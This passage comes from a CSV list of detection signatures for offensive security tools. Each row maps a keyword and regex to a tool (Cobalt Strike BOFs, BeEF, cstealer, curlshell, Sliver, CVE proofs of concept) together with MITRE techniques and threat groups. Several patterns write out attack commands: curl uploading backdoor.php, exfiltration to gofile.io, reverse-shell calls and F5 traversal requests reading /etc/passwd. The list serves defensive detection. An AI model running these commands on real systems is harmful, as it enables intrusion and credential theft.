Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*csOnvps*teamserver*",".{0,1000}csOnvps.{0,1000}teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*cSploit-*.apk*",".{0,1000}cSploit\-.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3236","1093","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z" 
"*cSploit/android*",".{0,1000}cSploit\/android.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3236","1093","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z" "*csprecon -*",".{0,1000}csprecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*CS-Remote-OPs-BOF*",".{0,1000}CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*csrf_to_beef*",".{0,1000}csrf_to_beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*CSSG_load.cna*",".{0,1000}CSSG_load\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*CStealer Builder ~ *",".{0,1000}CStealer\sBuilder\s\~\s.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*CStealer_assets\*",".{0,1000}CStealer_assets\\.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*C-Sto/gosecretsdump*",".{0,1000}C\-Sto\/gosecretsdump.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*C-Sto/goWMIExec*",".{0,1000}C\-Sto\/goWMIExec.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*cs-token-vault.git*",".{0,1000}cs\-token\-vault\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*CT_Indirect_Syscalls.c*",".{0,1000}CT_Indirect_Syscalls\.c.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.exe*",".{0,1000}CT_Indirect_Syscalls\.exe.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.sln*",".{0,1000}CT_Indirect_Syscalls\.sln.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*CT_Indirect_Syscalls.vcxproj*",".{0,1000}CT_Indirect_Syscalls\.vcxproj.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*cube0x0/LdapSignCheck*",".{0,1000}cube0x0\/LdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*cuddlephish*stealer.js",".{0,1000}cuddlephish.{0,1000}stealer\.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*cuddlephish-main*",".{0,1000}cuddlephish\-main.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*CUPLIS BYPASSS SHELL*",".{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*curi0usJack*",".{0,1000}curi0usJack.{0,1000}","offensive_tool_keyword","Github Username","github user hosting malicious code and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/curi0usJack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl * --upload-file backdoor.php -v*",".{0,1000}curl\s.{0,1000}\s\-\-upload\-file\sbackdoor\.php\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 
- T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*curl --connect-timeout 3.14 -s ifconfig.me*",".{0,1000}curl\s\-\-connect\-timeout\s3\.14\s\-s\sifconfig\.me.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*curl -F * https://*.gofile.io/uploadFile*",".{0,1000}curl\s\-F\s.{0,1000}\shttps\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*curl http*/handling-form-submission-complete/rce.jsp*",".{0,1000}curl\shttp.{0,1000}\/handling\-form\-submission\-complete\/rce\.jsp.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*curl http://172.23.0.1:1337/main*",".{0,1000}curl\shttp\:\/\/172\.23\.0\.1\:1337\/main.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - 
T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*curl https://curlshell*",".{0,1000}curl\shttps\:\/\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*curl -Ns telnet://*",".{0,1000}curl\s\-Ns\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*curl --output *http*/tomcatwar.jsp?*",".{0,1000}curl\s\-\-output\s.{0,1000}http.{0,1000}\/tomcatwar\.jsp\?.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*curl -s -o test.elf http://0.0.0.0:8001/test.elf*",".{0,1000}curl\s\-s\s\-o\stest\.elf\shttp\:\/\/0\.0\.0\.0\:8001\/test\.elf.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*curl -sk 'https://*/tmui/login.jsp/.. 
/tmui/util/getTabSet.jsp?tabId=Vulnerable*",".{0,1000}curl\s\-sk\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/util\/getTabSet\.jsp\?tabId\=Vulnerable.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -x socks5h://127.0.0.1:*",".{0,1000}curl\s\-x\ssocks5h\:\/\/127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" 
"*curl*/tmp/exploit-dirty-pipe*",".{0,1000}curl.{0,1000}\/tmp\/exploit\-dirty\-pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*curlshell.py*",".{0,1000}curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*cursed chrome",".{0,1000}cursed\schrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cursed cookies",".{0,1000}cursed\scookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Cursors\cursorinit.vbs*",".{0,1000}Cursors\\cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - 
Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*custom_payload_generator.*",".{0,1000}custom_payload_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","145","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*CustomKeyboardLayoutPersistence*",".{0,1000}CustomKeyboardLayoutPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*CVE-*.bash*",".{0,1000}CVE\-.{0,1000}\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.bat*",".{0,1000}CVE\-.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.bin*",".{0,1000}CVE\-.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.c*",".{0,1000}CVE\-.{0,1000}\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.com*",".{0,1000}CVE\-.{0,1000}\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","192","108","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" "*CVE-*.cpp*",".{0,1000}CVE\-.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 